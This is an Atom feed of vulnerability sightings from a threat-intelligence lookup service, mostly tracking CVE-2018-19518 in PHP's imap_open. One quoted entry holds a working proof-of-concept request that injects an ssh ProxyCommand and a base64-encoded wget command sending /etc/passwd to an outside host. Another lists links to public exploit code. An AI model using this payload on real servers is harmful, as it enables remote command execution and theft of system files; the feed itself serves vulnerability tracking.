<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://db.gcve.eu/sightings/feed</id>
  <title>Most recent sightings.</title>
  <updated>2026-07-18T04:03:44.570779+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>info@gcve.eu</email>
  </author>
  <link href="https://db.gcve.eu" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent sightings.</subtitle>
  <entry>
    <id>https://db.gcve.eu/sighting/ec703d60-8c88-40e4-894d-1bb008ad0293/export</id>
    <title>ec703d60-8c88-40e4-894d-1bb008ad0293</title>
    <updated>2026-07-18T04:03:44.585137+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "ec703d60-8c88-40e4-894d-1bb008ad0293", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-02", "content": "", "creation_timestamp": "2026-01-27T11:00:00.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/ec703d60-8c88-40e4-894d-1bb008ad0293/export"/>
    <published>2026-01-27T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/93400835-735f-4bbc-9f24-c5c40d198412/export</id>
    <title>93400835-735f-4bbc-9f24-c5c40d198412</title>
    <updated>2026-07-18T04:03:44.587240+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "93400835-735f-4bbc-9f24-c5c40d198412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:06.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/93400835-735f-4bbc-9f24-c5c40d198412/export"/>
    <published>2025-02-23T04:10:06+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/0b6ac037-5593-425f-9232-4c62c8536a7a/export</id>
    <title>0b6ac037-5593-425f-9232-4c62c8536a7a</title>
    <updated>2026-07-18T04:03:44.587793+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "0b6ac037-5593-425f-9232-4c62c8536a7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:43.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/0b6ac037-5593-425f-9232-4c62c8536a7a/export"/>
    <published>2025-02-06T03:13:43+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/43697854-483e-4876-8975-a5ee6e7228c9/export</id>
    <title>43697854-483e-4876-8975-a5ee6e7228c9</title>
    <updated>2026-07-18T04:03:44.588145+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "43697854-483e-4876-8975-a5ee6e7228c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://t.me/arpsyndicate/4390", "content": "#ExploitObserverAlert\n\nCVE-2018-19518\n\nDESCRIPTION: Exploit Observer has 46 entries in 10 file formats related to CVE-2018-19518. University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a \"-oProxyCommand\" argument.\n\nFIRST-EPSS: 0.969140000\nNVD-IS: 5.9\nNVD-ES: 1.6", "creation_timestamp": "2024-04-09T05:06:56.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/43697854-483e-4876-8975-a5ee6e7228c9/export"/>
    <published>2024-04-09T05:06:56+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/3756a222-ad08-45f4-9aa3-dccc6ad511e5/export</id>
    <title>3756a222-ad08-45f4-9aa3-dccc6ad511e5</title>
    <updated>2026-07-18T04:03:44.588383+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "3756a222-ad08-45f4-9aa3-dccc6ad511e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1649", "content": "#exploit\nCVE-2018-19518 (PHP IMAP Vulnerability):\nUniversity of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command without preventing argument injection, which might allow remote malicious users to execute arbitrary OS commands\n\nPoC:\necho \"wget --post-file /etc/passwd burpcollaborator(dot)net\" | base64 \n\nPOST / HTTP/1.1\nHost: Redacted\n\nhostname=x+-oProxyCommand%3echo%09d2dldCAtLXBvc3QtZmlsZSAvZXRjL3Bhc3N3ZCBidXJwY29sbGFib3JhdG9yLm5ldAo|base64%09-d|sh}&amp;amp;username=test&amp;amp;password=222", "creation_timestamp": "2022-12-14T23:09:09.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/3756a222-ad08-45f4-9aa3-dccc6ad511e5/export"/>
    <published>2022-12-14T23:09:09+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/fce819f4-0f51-4377-ab04-0b4ced484cac/export</id>
    <title>fce819f4-0f51-4377-ab04-0b4ced484cac</title>
    <updated>2026-07-18T04:03:44.588503+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "fce819f4-0f51-4377-ab04-0b4ced484cac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2807", "content": "#Analytics\n10 most exploited vulnerabilities of the week (feb 22-28)\nCVE-2021-3156 - Heap-Based Buffer Overflow in Sudo\nhttps://t.me/cybersecuritytechnologies/2577\nCVE-2021-21972 - VMware vCenter RCE\nhttps://swarm.ptsecurity.com/unauth-rce-vmware/#more-2477\nhttps://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC\nhttps://github.com/NS-Sp4ce/CVE-2021-21972\nhttps://github.com/yaunsky/CVE-2021-21972\nCVE-2021-1782 - iOS\\iPadOS 14.3 kernel LPE\nhttps://t.me/cybersecuritytechnologies/2694\nCVE-2021-3177 - Python3 Buffer Overflow\nhttps://t.me/cybersecuritytechnologies/2740\nCVE-2021-21973 - VMware vCenter SSRF\nhttps://mobile.twitter.com/osama_hroot/status/1365586206982082560/photo/1\nCVE-2017-0005 - Windows GDI EoP\nhttps://t.me/cybersecuritytechnologies/443\nCVE-2021-24093 - Win Graph. Component RCE\nhttps://t.me/cybersecuritytechnologies/2806\nCVE-2021-25281/25282 - SaltStack Exploit\nhttps://github.com/Immersive-Labs-Sec/CVE-2021-25281\nCVE-2018-19518 - PHP IMAP Vuln.\nhttps://t.me/cybersecuritytechnologies/1649", "creation_timestamp": "2021-03-01T11:00:27.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/fce819f4-0f51-4377-ab04-0b4ced484cac/export"/>
    <published>2021-03-01T11:00:27+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/4358d2dd-7666-4d2c-8f25-37e202844696/export</id>
    <title>4358d2dd-7666-4d2c-8f25-37e202844696</title>
    <updated>2026-07-18T04:03:44.588598+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "4358d2dd-7666-4d2c-8f25-37e202844696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19516", "type": "seen", "source": "https://t.me/cibsecurity/10484", "content": "ATENTION\u203c New - CVE-2018-19516\n\nmessagepartthemes/default/defaultrenderer.cpp in messagelib in KDE Applications before 18.12.0 does not properly restrict the handling of an http-equiv=\"REFRESH\" value.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-03-13T00:02:07.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/4358d2dd-7666-4d2c-8f25-37e202844696/export"/>
    <published>2020-03-13T00:02:07+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/b7a32522-919e-45cf-96cb-ed3bc9ed580e/export</id>
    <title>b7a32522-919e-45cf-96cb-ed3bc9ed580e</title>
    <updated>2026-07-18T04:03:44.588684+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "b7a32522-919e-45cf-96cb-ed3bc9ed580e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "exploited", "source": "https://www.exploit-db.com/exploits/45914", "content": "", "creation_timestamp": "2018-11-29T00:00:00.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/b7a32522-919e-45cf-96cb-ed3bc9ed580e/export"/>
    <published>2018-11-29T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://db.gcve.eu/sighting/651723c8-f11b-4cf1-9826-f97c1265e194/export</id>
    <title>651723c8-f11b-4cf1-9826-f97c1265e194</title>
    <updated>2026-07-18T04:03:44.588766+00:00</updated>
    <author>
      <name>cedric</name>
      <uri>https://db.gcve.eu/user/cedric</uri>
    </author>
    <content>{"uuid": "651723c8-f11b-4cf1-9826-f97c1265e194", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-19518", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/php_imap_open_rce.rb", "content": "", "creation_timestamp": "2018-11-27T22:53:35.000000Z"}</content>
    <link href="https://db.gcve.eu/sighting/651723c8-f11b-4cf1-9826-f97c1265e194/export"/>
    <published>2018-11-27T22:53:35+00:00</published>
  </entry>
</feed>
